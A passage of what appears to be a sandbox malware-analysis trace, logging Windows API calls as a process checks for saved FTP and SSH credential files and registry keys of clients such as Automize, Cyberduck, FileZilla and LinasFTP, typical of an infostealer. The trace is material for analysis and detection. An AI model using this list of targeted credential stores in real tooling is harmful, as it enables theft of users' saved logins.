(x86)\\Automize9\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.281] GetProcessHeap () returned 0x840000 [0183.281] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879f38 | out: hHeap=0x840000) returned 1 [0183.281] GetProcessHeap () returned 0x840000 [0183.281] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.282] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.283] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 64 [0183.283] GetProcessHeap () returned 0x840000 [0183.283] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x84) returned 0x879a28 [0183.283] GetProcessHeap () returned 0x840000 [0183.283] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.285] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.285] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize9\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.286] GetProcessHeap () returned 0x840000 [0183.286] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879a28 | out: hHeap=0x840000) returned 1 [0183.286] GetProcessHeap () returned 0x840000 [0183.286] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.287] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.287] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 44 [0183.287] GetProcessHeap () returned 0x840000 [0183.288] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x871d38 [0183.288] GetProcessHeap () returned 0x840000 [0183.288] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.288] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.289] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\encPwd.jsd") returned 0 [0183.289] GetProcessHeap () returned 0x840000 [0183.289] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.289] GetProcessHeap () returned 0x840000 [0183.289] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.290] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.291] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 65 [0183.291] GetProcessHeap () returned 0x840000 [0183.291] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x87a058 [0183.291] GetProcessHeap () returned 0x840000 [0183.291] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.292] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.296] GetProcessHeap () returned 0x840000 [0183.296] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a058 | out: hHeap=0x840000) returned 1 [0183.296] GetProcessHeap () returned 0x840000 [0183.296] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.297] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.298] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0183.298] GetProcessHeap () returned 0x840000 [0183.298] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x879908 [0183.298] GetProcessHeap () returned 0x840000 [0183.298] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.299] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.299] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize10\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.300] GetProcessHeap () returned 0x840000 [0183.300] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879908 | out: hHeap=0x840000) returned 1 [0183.300] GetProcessHeap () returned 0x840000 [0183.300] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.301] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.302] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 44 [0183.302] GetProcessHeap () returned 0x840000 [0183.302] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x871d38 [0183.302] GetProcessHeap () returned 0x840000 [0183.302] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.303] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.303] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\encPwd.jsd") returned 0 [0183.303] GetProcessHeap () returned 0x840000 [0183.303] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.303] GetProcessHeap () returned 0x840000 [0183.303] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.304] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.305] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 65 [0183.305] GetProcessHeap () returned 0x840000 [0183.305] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x879cf8 [0183.305] GetProcessHeap () returned 0x840000 [0183.305] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.306] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.306] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.306] GetProcessHeap () returned 0x840000 [0183.306] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879cf8 | out: hHeap=0x840000) returned 1 [0183.306] GetProcessHeap () returned 0x840000 [0183.306] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.307] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.308] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0183.308] GetProcessHeap () returned 0x840000 [0183.308] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x879248 [0183.308] GetProcessHeap () returned 0x840000 [0183.308] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.310] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.310] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize11\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.310] GetProcessHeap () returned 0x840000 [0183.310] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879248 | out: hHeap=0x840000) returned 1 [0183.310] GetProcessHeap () returned 0x840000 [0183.310] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.311] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.312] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 44 [0183.312] GetProcessHeap () returned 0x840000 [0183.312] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x871d38 [0183.312] GetProcessHeap () returned 0x840000 [0183.312] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.312] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.313] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\encPwd.jsd") returned 0 [0183.313] GetProcessHeap () returned 0x840000 [0183.313] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.313] GetProcessHeap () returned 0x840000 [0183.313] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.314] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.315] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 65 [0183.315] GetProcessHeap () returned 0x840000 [0183.315] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x87a178 [0183.315] GetProcessHeap () returned 0x840000 [0183.315] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.316] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.316] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.316] GetProcessHeap () returned 0x840000 [0183.316] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a178 | out: hHeap=0x840000) returned 1 [0183.316] GetProcessHeap () returned 0x840000 [0183.317] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.318] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.318] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0183.318] GetProcessHeap () returned 0x840000 [0183.318] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x879638 [0183.318] GetProcessHeap () returned 0x840000 [0183.319] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.354] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.354] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize12\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.354] GetProcessHeap () returned 0x840000 [0183.354] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879638 | out: hHeap=0x840000) returned 1 [0183.354] GetProcessHeap () returned 0x840000 [0183.354] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.355] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.356] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 44 [0183.356] GetProcessHeap () returned 0x840000 [0183.356] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x871d38 [0183.356] GetProcessHeap () returned 0x840000 [0183.356] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.356] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.356] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\encPwd.jsd") returned 0 [0183.357] GetProcessHeap () returned 0x840000 [0183.357] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.357] GetProcessHeap () returned 0x840000 [0183.357] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.357] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.358] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 65 [0183.358] GetProcessHeap () returned 0x840000 [0183.358] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x8796c8 [0183.358] GetProcessHeap () returned 0x840000 [0183.358] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.447] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.447] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.448] GetProcessHeap () returned 0x840000 [0183.448] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8796c8 | out: hHeap=0x840000) returned 1 [0183.448] GetProcessHeap () returned 0x840000 [0183.448] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.449] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.452] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0183.452] GetProcessHeap () returned 0x840000 [0183.452] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x879368 [0183.452] GetProcessHeap () returned 0x840000 [0183.452] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.453] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.453] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize13\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.454] GetProcessHeap () returned 0x840000 [0183.454] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879368 | out: hHeap=0x840000) returned 1 [0183.454] GetProcessHeap () returned 0x840000 [0183.454] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f64) returned 0x875288 [0183.455] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.455] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\encPwd.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 44 [0183.456] GetProcessHeap () returned 0x840000 [0183.456] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x5c) returned 0x871d38 [0183.456] GetProcessHeap () returned 0x840000 [0183.456] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.456] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.457] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\encPwd.jsd") returned 0 [0183.457] GetProcessHeap () returned 0x840000 [0183.457] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.457] GetProcessHeap () returned 0x840000 [0183.457] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.459] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.460] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\sshProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 65 [0183.460] GetProcessHeap () returned 0x840000 [0183.460] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x879518 [0183.460] GetProcessHeap () returned 0x840000 [0183.460] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.461] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.461] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\sshProfiles-j.jsd") returned 0 [0183.462] GetProcessHeap () returned 0x840000 [0183.462] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879518 | out: hHeap=0x840000) returned 1 [0183.462] GetProcessHeap () returned 0x840000 [0183.462] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f8e) returned 0x875288 [0183.463] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.464] wvsprintfW (in: param_1=0x875288, param_2="%s\\%s%i\\data\\settings\\ftpProfiles-j.jsd", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 65 [0183.464] GetProcessHeap () returned 0x840000 [0183.464] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x879fc8 [0183.464] GetProcessHeap () returned 0x840000 [0183.464] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.465] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.465] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Automize14\\data\\settings\\ftpProfiles-j.jsd") returned 0 [0183.465] GetProcessHeap () returned 0x840000 [0183.465] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879fc8 | out: hHeap=0x840000) returned 1 [0183.465] GetProcessHeap () returned 0x840000 [0183.465] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.466] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.466] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0183.466] GetProcessHeap () returned 0x840000 [0183.466] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f58) returned 0x875288 [0183.467] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.468] wvsprintfW (in: param_1=0x875288, param_2="%s\\Cyberduck", arglist=0x19f830 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 47 [0183.468] GetProcessHeap () returned 0x840000 [0183.468] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x62) returned 0x871d38 [0183.468] GetProcessHeap () returned 0x840000 [0183.468] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.468] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.469] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Cyberduck") returned 0 [0183.470] GetProcessHeap () returned 0x840000 [0183.470] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.470] GetProcessHeap () returned 0x840000 [0183.470] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.470] GetProcessHeap () returned 0x840000 [0183.470] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.471] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.472] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0183.472] GetProcessHeap () returned 0x840000 [0183.472] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5e) returned 0x875288 [0183.472] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.473] wvsprintfW (in: param_1=0x875288, param_2="%s\\iterate_GmbH", arglist=0x19f818 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 50 [0183.473] GetProcessHeap () returned 0x840000 [0183.473] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x68) returned 0x871d38 [0183.473] GetProcessHeap () returned 0x840000 [0183.473] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.474] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.474] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\iterate_GmbH") returned 0 [0183.474] GetProcessHeap () returned 0x840000 [0183.474] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.474] GetProcessHeap () returned 0x840000 [0183.474] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.475] GetProcessHeap () returned 0x840000 [0183.475] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.475] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.476] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0183.478] GetProcessHeap () returned 0x840000 [0183.478] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x875288 [0183.478] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.479] wvsprintfW (in: param_1=0x875288, param_2="%s\\.config\\fullsync\\profiles.xml", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 51 [0183.479] GetProcessHeap () returned 0x840000 [0183.479] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6a) returned 0x871d38 [0183.479] GetProcessHeap () returned 0x840000 [0183.479] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.480] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.480] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\.config\\fullsync\\profiles.xml") returned 0 [0183.480] GetProcessHeap () returned 0x840000 [0183.480] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.480] GetProcessHeap () returned 0x840000 [0183.480] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.603] GetProcessHeap () returned 0x840000 [0183.603] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f72) returned 0x875288 [0183.604] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.604] wvsprintfW (in: param_1=0x875288, param_2="%s\\FTPInfo\\ServerList.xml", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 60 [0183.604] GetProcessHeap () returned 0x840000 [0183.604] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7c) returned 0x871d38 [0183.605] GetProcessHeap () returned 0x840000 [0183.605] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.605] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.605] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.xml") returned 0 [0183.606] GetProcessHeap () returned 0x840000 [0183.606] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.606] GetProcessHeap () returned 0x840000 [0183.606] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f72) returned 0x875288 [0183.607] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.608] wvsprintfW (in: param_1=0x875288, param_2="%s\\FTPInfo\\ServerList.cfg", arglist=0x19f83c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 60 [0183.608] GetProcessHeap () returned 0x840000 [0183.608] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7c) returned 0x871d38 [0183.608] GetProcessHeap () returned 0x840000 [0183.608] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.609] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.609] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPInfo\\ServerList.cfg") returned 0 [0183.609] GetProcessHeap () returned 0x840000 [0183.610] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.610] GetProcessHeap () returned 0x840000 [0183.610] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e8) returned 0x873a58 [0183.610] GetProcessHeap () returned 0x840000 [0183.610] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xc) returned 0x872310 [0183.610] GetProcessHeap () returned 0x840000 [0183.610] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0183.611] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.612] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software\\LinasFTP\\Site Manager", phkResult=0x871b08 | out: phkResult=0x871b08*=0x0) returned 0x2 [0183.612] GetProcessHeap () returned 0x840000 [0183.612] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0183.612] GetProcessHeap () returned 0x840000 [0183.612] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.612] GetProcessHeap () returned 0x840000 [0183.612] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872310 | out: hHeap=0x840000) returned 1 [0183.612] GetProcessHeap () returned 0x840000 [0183.612] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.613] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.613] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0183.613] GetProcessHeap () returned 0x840000 [0183.614] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f74) returned 0x875288 [0183.614] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.615] wvsprintfW (in: param_1=0x875288, param_2="%s\\FileZilla\\Filezilla.xml", arglist=0x19f844 | out: param_1="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 46 [0183.615] GetProcessHeap () returned 0x840000 [0183.615] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x60) returned 0x871d38 [0183.615] GetProcessHeap () returned 0x840000 [0183.615] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.616] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.616] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FileZilla\\Filezilla.xml") returned 0 [0183.617] GetProcessHeap () returned 0x840000 [0183.617] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.617] GetProcessHeap () returned 0x840000 [0183.617] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.617] GetProcessHeap () returned 0x840000 [0183.617] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f74) returned 0x875288 [0183.618] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.619] wvsprintfW (in: param_1=0x875288, param_2="%s\\FileZilla\\filezilla.xml", arglist=0x19f838 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 61 [0183.619] GetProcessHeap () returned 0x840000 [0183.619] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7e) returned 0x871d38 [0183.619] GetProcessHeap () returned 0x840000 [0183.619] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: 